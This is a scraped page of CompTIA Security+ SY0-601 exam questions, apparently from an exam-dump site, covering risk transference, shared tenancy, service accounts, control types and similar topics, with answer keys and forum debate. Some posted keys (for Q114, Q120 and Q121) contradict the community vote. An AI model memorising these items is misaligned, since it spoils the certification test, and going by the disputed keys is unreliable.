5. Apply this new Response Rule to the Policy (Response Rule Tab)
upvoted 17 times

  Blake89 3 weeks ago


You and the 15 others who upvoted are whats wrong with these forums. B is the answer.
upvoted 3 times

  NBE 4 days ago


You are wrong, A is correct.
upvoted 1 times

  Jakalan7 4 months, 1 week ago


That's correct, he can't place data blockers on all public USB ports, but you can get them as portable peripherals that users can carry around
with them, they're only small and can just sit on the end of the charging cable.
upvoted 6 times

  ExamTopicsDiscussor 4 months ago


This. USB data blockers are PORTABLE. It's what you connect to the end of the cord.
upvoted 3 times

  zf1343 1 week ago


The question is about enforcement when dealing with sensitive information. What if user accidentally plugs in without data blocker? Go
with DLP to be sure.
upvoted 1 times

  comeragh Highly Voted  5 months ago


Selected Answer: B
B looks to be correct here
upvoted 14 times

  Blake89 Most Recent  3 weeks ago


Selected Answer: B
The CompTia Sec+ Study Guide book literally talks about USB data blockers when using public charging stations. Y'all overthink way too much
sometimes.
upvoted 9 times

  LaoX 1 month ago


Selected Answer: A
The CISO shouldn't place a USB data blocker on personnel's device but a DLP is best to implement.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 192/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: B
It says public charging... This is not under the control of the company. You can't apply DLP... etc for a charging station in an airport. The
employee can use a USB condom that doesn't have data pins.
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best solution to prevent exfiltration of sensitive information from employee cell phones when using public USB power charging stations
would be to use a USB data blocker. A USB data blocker is a device that can be used to physically block the data pins on a USB cable,
preventing data transfer while still allowing the device to be charged. This would prevent employees from accidentally or maliciously transferring
sensitive data from their cell phones to the public charging station. Options A, C, and D would not be effective in preventing this type of data
exfiltration
upvoted 2 times

  okay123 2 months, 2 weeks ago


Selected Answer: B
Y'all are over thinking this, it's B. Data blockers are portable and it's used for this very purpose.
upvoted 4 times

  The_F00L 3 months ago


I'm going with A. Anyone who deals with users knows theres no way your going to get them to reliably use portable USB data blockers.
Implementing DLP (and disabling OTG) is the only dependable way to tackle this issue
upvoted 2 times

  lordguck 3 months ago


The use of a USB data blocker can neither enforced (without using soldering iron at least) nor controlled, so it's no help in prevention of
exfiltration. It's A then.
upvoted 3 times

  CapJackSparrow 3 months, 2 weeks ago


Selected Answer: A
due to Dions BYOD video (Video #51 on udemy) id say its DLP.
upvoted 3 times

  CapJackSparrow 3 months, 2 weeks ago


Dions video (Video #51) specifically says companies use MDM to enable DLP solutions. Seems DLP would be the MOST practical. While USB
data blocker would work it would not be very practical. Hate questions like these because you can overthink your way to the wrong answer
easily.
upvoted 1 times

  Tomtom11 3 months, 3 weeks ago


Selected Answer: B
A USB data blocker prevents attackers from infecting a
device with malware or stealing data.
When charging
your phone in locations such as airports, or other unknown power sources,
the use of a USB data blocker protects the phone but allows it to charge
upvoted 4 times

  Fastytop 3 months, 3 weeks ago


Selected Answer: A
I think A and B is correct, but her they asked about the best way to prevent, if the company hat 100 employee that meaning we must think about
the cost! and about if the employee forget the USB And more about updates. I think that it is DLPbecause it is not forgotten by employees
because it is existing in the mobile phone, and also its costs will be lower and its updates are better and keep pace with the most developments
in viruses.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


https://packinglighttravel.com/travel-tech/do-you-need-a-usb-data-blocker/
upvoted 1 times

  VendorPTS 4 months ago


Selected Answer: B
USB data blocker - Also sometimes called a USB Condom. This is the only thing that will block physical access to your USB. DLP can't hope to
address all the potential exploits that are possible when an attacker has physical USB data access to your device.
https://infotracer.com/infocenter/how-to-use-a-usb-condom-and-why/
upvoted 4 times

  Gravoc 4 months, 2 weeks ago


This is a tough one, but ultimately I believe DLP to be the most correct. Look into Microsoft Intune and McAfee MobileIron. They are mobile
application DLP solutions that offer reach beyond the corporate network boundaries.

The question asks for the BEST solution. USB data blockers are good, but they're reliant on the employee actually using them. A DLP solution

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 193/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

such as MobileIron forces compliance, by locking corporate resources behind a secure application. For example: Users any mobile device policy,
such as BYOD, CYOD, and COPE. If they want to access their corporate email on their phone. They will need to sign into the MobileIron
application, in order to be granted visibility to their corporate email account. Since the emails are being read/sent through the MobileIron
application. Safeguards can be applied even on an outside network-mobile level. If an employee attempts to send a customers social security
number, the MobileIron will either block it, alert it, or both, contingent on how the company setup the MobileIron service to work.
upvoted 3 times

  Gravoc 4 months, 2 weeks ago


Oops, to add onto this. DLP also offers data exfiltration prevention and detection. Going back to our email example. If a user plugs into a
public USB port that is compromised, and signs into their secure MobileIron application. The MobileIron application acts as a data blocker of
its own.
upvoted 2 times

  tibetbey 5 months ago


Selected Answer: B
USB Data Blocker; The main purpose of using one is to eliminate the risk of infecting your phone or tablet with malware, and even prevent
hackers to install/execute any malicious code to access your data.
upvoted 6 times

Question #112 Topic 1

The board of directors at a company contracted with an insurance firm to limit the organization's liability. Which of the following risk management
practices does this BEST describe?

A. Transference

B. Avoidance

C. Mitigation

D. Acknowledgement

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
organization's liability -> organization's RESPONSABILITY
upvoted 7 times

  DALLASCOWBOYS 5 days, 18 hours ago


Most Recent 
A. Insurance is transferring the risk to the insurance company
upvoted 1 times

  Boubou480 4 weeks, 1 day ago


Selected Answer: A
Insurance = Tranfert
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The board of directors at a company contracted with an insurance firm to limit the organization's liability BEST describes the risk management
practice of transference. Transference is the process of transferring the risk of loss from one party to another, typically through the use of
insurance. In this case, the company is transferring the risk of potential liability to the insurance firm by purchasing an insurance policy. This
allows the company to limit its potential losses in the event of a liability claim. Options B, C, and D do not accurately describe the situation
described in the question.
upvoted 1 times

  db97 4 months, 1 week ago


if something happens, the insurance company will assume responsibility (Transference)
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 194/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #113 Topic 1

Which of the following is a risk that is specifically associated with hosting applications in the public cloud?

A. Unsecured root accounts

B. Zero-day

C. Shared tenancy

D. Insider threat

Correct Answer: C

Community vote distribution


C (85%) D (15%)

  IGUESS Highly Voted  1 year ago


Shared Tenancy Vulnerabilities.

In a multi-tenant environment, such as the cloud, a “container” vulnerability can allow an attacker to compromise containers of other tenants on
the same host. Flaws in chip design can also result in the compromise of tenant information in the cloud through side-channel attacks.
upvoted 15 times

  DALLASCOWBOYS Most Recent  5 days, 18 hours ago


C. Shared tenancy is the risk associated with the Cloud.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
A risk that is specifically associated with hosting applications in the public cloud is shared tenancy. Shared tenancy refers to the practice of
multiple customers sharing the same physical infrastructure in a cloud environment. This can create security risks, as the actions of one customer
can potentially impact the security and performance of other customers on the same infrastructure. Options A, B, and D are not specifically
associated with hosting applications in the public cloud, although they can be potential risks in any computing environment.
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
"C" shared tenancy is a cloud specific threat. Insider threats are also applicable to on-prem
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


Selected Answer: C
The answer has to be C, since A, B and D are not specific to cloud platforms.
upvoted 2 times

  ishallgetit 9 months, 2 weeks ago


Selected Answer: C
"specifically associated with hosting applications in the public cloud"
C: shared tenancy
upvoted 4 times

  Branchflake 10 months, 1 week ago


I read this twice and still missed the "public " cloud. Shared Tenancy
upvoted 1 times

  Dunzel 10 months, 3 weeks ago


Why would it be D? How is an insider threat "specifically associated with hosting applications in the public cloud?" Insider threats are everywhere
- not just in the cloud.
upvoted 2 times

  CLAW_ 11 months ago


I didnt read the question properly and chose Unsecured Accounts, this is wrong. The correct answer is Shared Tenancy given that the clue in the
question is "Public" cloud.
upvoted 2 times

  szl0144 11 months, 3 weeks ago


Selected Answer: C
C is the correct answer, cloud server are multi-tenant
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 195/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  bugrovac 1 year ago


Selected Answer: D
Correct Answer: D
upvoted 2 times

  ansenlool88 11 months, 3 weeks ago


insider threat is also on different types of cloud, or premise location and any datacenter or LAN or WAN. dont think D is correct. keywords on
the question is PUBLIC CLOUD
upvoted 3 times

  greenerme 12 months ago


An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former
employees, contractors or business associates, who have inside information concerning the organization's security practices, data and
computer systems
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 196/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #114 Topic 1

DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is researching alternatives to make the cloud
environment respond to load fluctuation in a cost-effective way. Which of the following options BEST fulfills the architect's requirements?

A. An orchestration solution that can adjust scalability of cloud assets

B. Use of multipath by adding more connections to cloud storage

C. Cloud assets replicated on geographically distributed regions

D. An on-site backup that is displayed and only used when the load increases

Correct Answer: D

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
A. An orchestration solution that can adjust scalability of cloud assets -> this is the correct answer IMO - this is what elasticity in cloud is all
about, we are only creating new resources when there is a workload spike.
B. Use of multipath by adding more connections to cloud storage -> this doest address the issue of dealing with the additional load on the
servers
C. Cloud assets replicated on geographically distributed regions -> hot or warm recovery sites ( not cost effective )
D. An on-site backup that is displayed and only used when the load increases ( not cost effective since the on-site will be always on behind the
scenes)
upvoted 25 times

  Gino_Slim 3 months, 1 week ago


In stoneface we trust (that means this is the right answer)
upvoted 4 times

  carpathia Most Recent  2 months, 1 week ago


Selected Answer: A
It cannot be B: "What is multipathing in cloud computing?
Multipathing, also called SAN multipathing or I/O multipathing, is the establishment of multiple physical routes between a server and the storage
device that supports it."
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I think A
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


I agree with stoneface on A. Remember that backups are expensive. Which is the entire reason for the convoluted process of hot, warm, and cold
sites.

Scaling cloud infrastructures can experience lag during the periods of high activity, where other assets have to either be added, or become
active. This is the compromise for a cost-effective solution that scales. The company could go for a system that is absolutely overkill on assets at
all times, in preparation for those brief peak moments. But this is expensive, and unlikely to be taken by most companies. Only case you would
want to use one of these is if you have a sensitive or critical service that MUST remain online. Stock exchange servers, military servers, bank
servers, etc. come to mind for this criteria.
upvoted 3 times

  lucasvs_ 5 months ago


Selected Answer: A
Yes a ido
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 197/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #115 Topic 1

Which of the following documents provides expectations at a technical level for quality, availability, and responsibilities?

A. EOL

B. SLA

C. MOU

D. EOSL

Correct Answer: B

Community vote distribution


B (100%)

  Strykar Highly Voted  4 months, 1 week ago


Selected Answer: B
This site needs a Dark Mode.
upvoted 17 times

  snofear 4 months ago


Use Dark Reader-Chrome extension
upvoted 7 times

  J_Ark1 3 months ago


thanks for that :)
upvoted 2 times

  banditring 4 months, 1 week ago


AGREED!
upvoted 3 times

  comeragh Highly Voted  5 months ago


Selected Answer: B
B - Service Level Agreement (SLA)
upvoted 7 times

  Sandon Most Recent  2 weeks ago


An old ITIL question. Definitely B
upvoted 1 times

  KingDrew 3 weeks ago


Selected Answer: B
B: SLA (Service Level Agreement)
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
A document that provides expectations at a technical level for quality, availability, and responsibilities is a Service Level Agreement (SLA). An SLA
is a contract between a service provider and a customer that specifies the level of service that the provider will deliver. This typically includes
technical details such as uptime, response times, and performance criteria. The SLA is used to ensure that the customer receives the level of
service that they have agreed to and that the provider is held accountable for meeting those expectations. Options A, C, and D are not related to
the technical level of service expectations. EOL refers to the end of life for a product or service, MOU is a memorandum of understanding, and
EOSL is the end of service life.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 198/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #116 Topic 1

Which of the following is an example of transference of risk?

A. Purchasing insurance

B. Patching vulnerable servers

C. Retiring outdated applications

D. Application owner risk sign-off

Correct Answer: A

Community vote distribution


A (100%)

  comeragh Highly Voted  5 months ago


Selected Answer: A
Correct answer A here
upvoted 9 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: A
Answer: Purchasing Insurance

Cyber insurance covers a business' liability for a data breach involving sensitive customer information like health records, credit card numbers,
account numbers etc. A few things insurance generally handle are legal fees, notifying customers of the data breach, and repairing damaged
systems.

Risk transference is about assigning risk to a third-party. The risk here being the financial loss that can be incurred after a data breach from legal
fees, repairing system etc. The organization is assigning this risk to an insurance company.
upvoted 3 times

  Sarooor 3 months ago


can someone explain why the correct
answer is A??
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 199/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #117 Topic 1

An employee received a word processing file that was delivered as an email attachment. The subject line and email content enticed the employee
to open the attachment. Which of the following attack vectors BEST matches this malware?

A. Embedded Python code

B. Macro-enabled file

C. Bash scripting

D. Credential-harvesting website

Correct Answer: B

Community vote distribution


B (100%)

  IQ30 Highly Voted  5 months ago


Jason Dion notes:
Macro
o Virus embedded into a document and is executed when
the document is
opened by the user
upvoted 11 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: B
Answer: Macro-enabled file

Phishing emails with a word document attachment typically will have macros that can be ran for malicious purposes. Macros are scripts that can
run whatever you want and however many times you want it to run, it's generally used for automating frequently used tasks.

Since macros can practically do whatever you want, they can be used for malicious purposes such as infecting other files, or
downloading/installing other malicious software.

Macros would normally run as soon as the document is opened but now macros are disabled in Office apps by default so you would need to
manually enable marcos on the file for them to run.
upvoted 3 times

  samwin111 3 months, 3 weeks ago


Selected Answer: B
Python will not run on doc files
Macro runs on doc files
upvoted 2 times

  comeragh 5 months ago


Selected Answer: B
B - correct answer here
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 200/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #118 Topic 1

A security proposal was set up to track requests for remote access by creating a baseline of the users' common sign-in properties. When a
baseline deviation is detected, an MFA challenge will be triggered. Which of the following should be configured in order to deploy the proposal?

A. Context-aware authentication

B. Simultaneous authentication of equals

C. Extensive authentication protocol

D. Agentless network access control

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
Context-Aware authentication -> An access control scheme that verifies an object's identity based on various environmental factors, like time,
location, and behavior.
upvoted 26 times

  J_Ark1 3 months ago


yes i agree
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Most Recent 
Context: "The circumstances that form the setting for an event, statement, or idea, and in terms of which it can be fully understood and
assessed."

CAA is likely correct, as the context is that the login attempt deviates from the baseline, triggering an additional authentication layer.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 201/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #119 Topic 1

Which of the following secure coding techniques makes compromised code more difficult for hackers to use?

A. Obfuscation

B. Normalization

C. Execution

D. Reuse

Correct Answer: A

Community vote distribution


A (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: A
A is correct
upvoted 8 times

  ScottT 4 months, 3 weeks ago


https://en.wikipedia.org/wiki/Obfuscation_(software)
upvoted 1 times

  Fitzd Highly Voted  4 months, 3 weeks ago


Three of the most common techniques used to obfuscate data are encryption, tokenization, and data masking.
upvoted 6 times

  madmax1984 Most Recent  1 week, 6 days ago


Selected Answer: A
Code obfuscation makes the code more difficult to read. Stored procedures are used with SQL databases and can be used for input validation.
Normalization refers to organizing tables and columns in a database to reduce redundant data and improve overall database performance.
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: A
A is the right answer here.
I know because I've done exactly that for web dev stuff, lol.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Obfuscation

Obfuscation is the action of making something obscure, unclear, or unintelligible. In software development, obfuscation is the act of creating
code that is difficult for humans or computers to understand.
upvoted 4 times

  Gravoc 4 months, 2 weeks ago


Don't forget that obfuscation works in the reverse as well. Hackers usually obfuscate their malware and viruses to avoid signature detectors.
Things such as writing arbitrary and benign looking code, and sneaking malicious functions into it. Or hackers also like to stretch the key length
of their encryption, or use naming conventions that are only easily understandable by the person who created it.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 202/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #120 Topic 1

As part of a security compliance assessment, an auditor performs automated vulnerability scans. In addition, which of the following should the
auditor do to complete the assessment?

A. User behavior analysis

B. Packet captures

C. Configuration reviews

D. Log analysis

Correct Answer: A

Community vote distribution


D (44%) C (44%) 11%

  stoneface Highly Voted  5 months ago


Selected Answer: C
Configuration reviews should also be performed.
upvoted 26 times

  hazeleyes Highly Voted  4 months, 3 weeks ago


Selected Answer: D
D. log analysis. It's not C because configuration review is part of the vulnerability scan. Vulnerability scan can produce false positives, which is
why its effectiveness can be enhanced by log reviews to see whether an identified vulnerability is in fact valid.
upvoted 24 times

  zf1343 1 week ago


Compliance is all about configuration. Log analysis and packet captures are more of troubleshooting tools than compliance factors.
upvoted 2 times

  DALLASCOWBOYS Most Recent  4 days, 12 hours ago


C. Configuration reviews. The auditor provides their opinion on the effectiveness of the operating controls. The auditor confirms that the controls
are functioning properly in a Type 2 report, and in a Type 1 report, the auditior's opinion on the suitability of the design of the controls.
upvoted 1 times

  ronniehaang 4 days, 15 hours ago


Selected Answer: D
D. Log analysis

Log analysis is a critical component in the security compliance assessment process as it provides information about the activities taking place on
the system, including attempted or successful security breaches. This information can be used to identify patterns of malicious behavior and
determine if specific security policies are being violated. The auditor can analyze logs from firewalls, intrusion detection systems, web servers,
and other sources to gain a comprehensive view of the security posture of the system. The auditor can also use log analysis tools to identify
security incidents and perform in-depth forensic analysis to determine the root cause and extent of the breach. By combining automated
vulnerability scans with log analysis, the auditor can gain a more complete understanding of the system's security posture and ensure that the
organization is meeting compliance requirements.
upvoted 1 times

  pwino 3 days, 20 hours ago


I see someone's using AI productively. Lol.

As per ChatGPT - D. Log Analysis is correct for the reasons given above.
upvoted 1 times

  AC1984 3 weeks ago


Selected Answer: C
Configuration reviews is the next step
upvoted 2 times

  Waniey 1 month, 1 week ago


D. Vulnerability scanning does that. And deter known vulnerability
upvoted 1 times

  Gary_Phillips_2007 1 month, 2 weeks ago


Here’s what ChatGPT says:
The correct answer is C, Configuration reviews.

Performing automated vulnerability scans is a useful technique for identifying potential security vulnerabilities in a system. However, it is not
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 203/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

sufficient on its own to complete a comprehensive security compliance assessment. In addition to performing automated vulnerability scans, the
auditor should also review the system's configurations to ensure that they are in compliance with relevant security standards and guidelines.

User behavior analysis involves analyzing the actions and behaviors of users to identify potential security risks.

Packet captures involve capturing and analyzing the data packets transmitted over a network to identify potential security risks.

Log analysis involves reviewing and analyzing system logs to identify potential security risks.
upvoted 5 times
  FMMIR 1 month, 3 weeks ago
Selected Answer: C
In order to complete a security compliance assessment, the auditor should perform configuration reviews in addition to automated vulnerability
scans. Configuration reviews involve examining the settings and configurations of systems and devices to ensure that they are in compliance
with security standards and best practices. This can help to identify vulnerabilities or misconfigurations that may not be detected by automated
scans. In addition to configuration reviews, the auditor may also want to perform log analysis, user behavior analysis, and packet captures to
gain a more complete understanding of the organization's security posture. These additional steps can provide valuable information about
potential security issues and can help the auditor to make more accurate recommendations for improving the organization's security compliance
upvoted 1 times

  tek7ila 1 month, 4 weeks ago


I made some reading, and I also think it should be D. Couse like other ppl said - conf. review is part of vulnerability scan.
upvoted 1 times

  deeden 2 months ago


Selected Answer: C
Haven't encountered much auditors analyzing logs, but only to know that they exist and being retained for a prescribed period. They do check
the hardening configurations though, especially those mentioned in company policies, making sure it is set as claimed.
upvoted 2 times

  FMMIR 2 months, 1 week ago


Selected Answer: C
Configuration reviews can help ensure that servers and network devices are securely configured, and alert you to any errors and
misconfigurations. While vulnerability assessments and penetration testing provide an analysis from an external point of view, configuration
reviews provide an in-depth view from within your servers and network devices.
upvoted 1 times

  carpathia 2 months, 2 weeks ago


Selected Answer: D
Under Security Assessment in this book I am studying, Config Review and Log review are under the Vulnerability scan. However, Log analysis
[syslog, SIEM etc] is listed separately in the same chapter, not under the vulnerability scan.
upvoted 1 times

  carpathia 2 months, 1 week ago


Even though, packet captures and Config review are also listed under the same chapter....
upvoted 1 times

  atrax 3 months, 2 weeks ago


I work in GRC for the DoD, D is correct
upvoted 3 times

  Gino_Slim 3 months, 1 week ago


Oh my....can't deny those credentials (lol)
upvoted 6 times

  rindrasakti 3 months, 3 weeks ago


Selected Answer: D
Vote for D because Configuration review is part of the vulnerability scan
upvoted 5 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: A
Am I the only person who thinks it is A, User Behavior Analysis? It would seem the ongoing vulnerability scanning would find flaws in the
systems, and the user behavior analysis would find flaws in the users?
upvoted 6 times

  Gino_Slim 3 months, 1 week ago


Yes, yes you are.
upvoted 2 times

  db97 4 months, 1 week ago


C - Configuration reviews
upvoted 3 times

  Strykar 4 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 204/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: D
It's D
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 205/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #121 Topic 1

A database administrator wants to grant access to an application that will be reading and writing data to a database. The database is shared by
other applications also used by the finance department. Which of the following account types is MOST appropriate for this purpose?

A. Service

B. Shared

C. Generic

D. Admin

Correct Answer: C

Community vote distribution


A (96%) 4%

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
Service accounts are a special type of non-human privileged account used to execute applications and run automated services, virtual machine
instances, and other processes. Service accounts can be privileged local or domain accounts, and in some cases, they may have domain
administrative privileges
upvoted 21 times

  DALLASCOWBOYS Most Recent  4 days, 11 hours ago


A. Service accounts are associated with applications and services.
upvoted 1 times

  nul8212 1 month, 2 weeks ago


Selected Answer: C
generic account A preset, standard, common, guest, fixed, shared, or anonymous
user account.
upvoted 1 times

  Blake89 2 weeks, 2 days ago


Absolutely not. People like you need to stop commenting on these threads.
upvoted 5 times

  zharis 3 months, 1 week ago


Service accounts are used by scheduled processes and application server software such as databases
upvoted 1 times

  [Removed] 3 months, 3 weeks ago


Selected Answer: A
Service accounts associated with applications and services.
upvoted 1 times

  ergo54 3 months, 4 weeks ago


Selected Answer: A
Agreed its A. The study guide explicitly states that generic accounts are for many different individuals doing the same work whereas a service
account is explicitly for a application/service to run its work.
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I think A is most appropriate
upvoted 1 times

  k9_462 5 months ago


Selected Answer: A
i would go with A-service account
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 206/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #122 Topic 1

A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for further incident analysis. Which
of the following tools will the other team member MOST likely use to open this file?

A. Autopsy

B. Memdump

C. FTK imager

D. Wireshark

Correct Answer: D

Community vote distribution


D (100%)

  DALLASCOWBOYS 4 days, 11 hours ago


D. Wireshark analyzes packet captures
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: D
Wireshark. Did this for my eJPT exam.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Wireshark

PCAP or Packet Capture is an interface used for capturing live network packet data. PCAP files like 'host1.pcap' are data files created by
network analyzers like Wireshark that are used to collect and record packet data from a network. These files which can be used for analyzing the
network traffic.
==================================
Other Tools/Options
(A) Autopsy - A platform that provides digital forensic tools

(B) Memdump - The memdump tool is a program that can do memory dumps. A memory dump is the process of taking all data in RAM and
storing it on a hard drive for like applications or for the case of a system crash. The memdump tool will dump the contents of physical memory by
default.

(c) FTk Imager - Forensic Toolkit (FTK) is forensics software and FTK Imager a tool that can be used to create forensic images. Forensic images is
basically a copy of an entire physical hard drive including files, folders etc.
upvoted 2 times

  Blake89 2 weeks, 2 days ago


Autopsy IS a TOOL. Not a platform for multiple tools. It's main purpose is to view and recover data from storage devices. People like you need
to really stop talking in here.
upvoted 2 times

  Elyria 1 week, 4 days ago


How about you get a life and YOU stop commenting here. All I see under every discussion is you crying about other people participating.
Grow up.
upvoted 4 times

  Blake89 1 week, 3 days ago


Elyria, How about you quit crying about me calling out people who are talking nonsense and giving out false information? These are not
opinions, it's all factual. Take your little delicate sensitivities to Facebook.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
pcap is wireshark
upvoted 3 times

  Gravoc 4 months, 2 weeks ago


Wireshark. I've opened enough pcap's in wireshark to know this one :p.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 207/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  okay123 5 months ago


Wireshark is a network packet analyzer. A network packet analyzer presents captured packet data in as much detail as possible.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: D
D - Wireshark
upvoted 4 times

Question #123 Topic 1

An application developer accidentally uploaded a company's code-signing certificate private key to a public web server. The company is concerned
about malicious use of its certificate. Which of the following should the company do FIRST?

A. Delete the private key from the repository.

B. Verify the public key is not exposed as well.

C. Update the DLP solution to check for private keys.

D. Revoke the code-signing certificate.

Correct Answer: D

Community vote distribution


D (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: D
We need to revoke the code-signing certificate as this is the most secure way to ensure that the comprised key wont be used by attackers.
Usually there are bots crawking all over repos searching this kind of human errors.
upvoted 14 times

  DALLASCOWBOYS Most Recent  4 days, 11 hours ago


D. Revoke the code-signing certificate.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


revoke the certificate and you should perform user training to minimize the chance for this to happen again
upvoted 2 times

  Jossie_C 3 months ago


Selected Answer: D
D is containment
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
This is D
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Revoke they certificate with a revocation authority, and go about getting a new one with a certificate authority.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 208/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #124 Topic 1

An organization implemented a process that compares the settings currently configured on systems against secure configuration guidelines in
order to identify any gaps. Which of the following control types has the organization implemented?

A. Compensating

B. Corrective

C. Preventive

D. Detective

Correct Answer: D

Community vote distribution


D (58%) C (41%)

  Gravoc Highly Voted  4 months, 2 weeks ago


From the official study guide:
"Compensating - controls designed to mitigate the risk associated with exceptions made to a security policy.

Corrective - remediate security issues that have already occurred. Restoring backups after a ransomware attack is an example of a corrective
control.

Preventive - intend to stop a security issue before it occurs. Firewalls and encryption are examples of preventive controls.

Detective - identify security events that have already occurred. Intrusion detection systems are detective controls."

Based on this, Preventive makes the most sense to me. They are comparing the configurations to a secure guideline to ensure no gaps. Meaning
they are pre-emptively hardening their systems against future attack vectors.
upvoted 29 times

  J_Ark1 2 months, 4 weeks ago


Stone face wisdom here :)
upvoted 3 times

  BigLao 3 months ago


They're comparing to "identify any gaps" not to ensure any gaps.

Two different things


upvoted 3 times

  jgp Highly Voted  5 months ago


Selected Answer: D
"...identify..."
upvoted 13 times

  Strykar 4 months, 1 week ago


"Identify so it can be Prevented". It better to read and understand the whole question and not just a keyword.
upvoted 7 times

  DeezusNewtus Most Recent  1 day, 11 hours ago


Selected Answer: C
The answer should be C, Preventive.

Detective Controls identify details and data associated with an INCIDENT's activities. The question doesn't list an incident, so it must be a
preventive control. Comparing configurations to identify gaps is an act of avoiding an incident from occurring, therefore preventive.

https://linfordco.com/blog/importance-of-preventive-controls/
upvoted 1 times

  constant380 3 days, 1 hour ago


Selected Answer: C
Preventif: intervient avant que l'attaque puisse se produire
Détective: Permet par contre de détecter les attaques et non les vulnérabilités
upvoted 1 times

  DALLASCOWBOYS 4 days, 11 hours ago


C. Preventive controls. Nothing in the question suggests an incident has occured, therefore, detective controls is out. They are comparing
configuration settings to prevent an incident from occurring

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 209/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  ronniehaang 4 days, 14 hours ago
Selected Answer: D
The organization has implemented a Detective control type.

Detective controls are designed to identify and alert on security incidents or violations that have occurred. They can be implemented through
various mechanisms such as intrusion detection systems, security information and event management (SIEM) systems, and security audits. The
process of comparing the settings currently configured on systems against secure configuration guidelines identifies any gaps in security and is
thus a detective control. These controls are used to detect security incidents, security violations, or deviations from established policies and
procedures and to provide data that can be used to support a forensic investigation.
upvoted 1 times

  LasinduJ 5 days, 1 hour ago


ChatGPT says C.
upvoted 2 times

  LaoX 4 weeks, 1 day ago


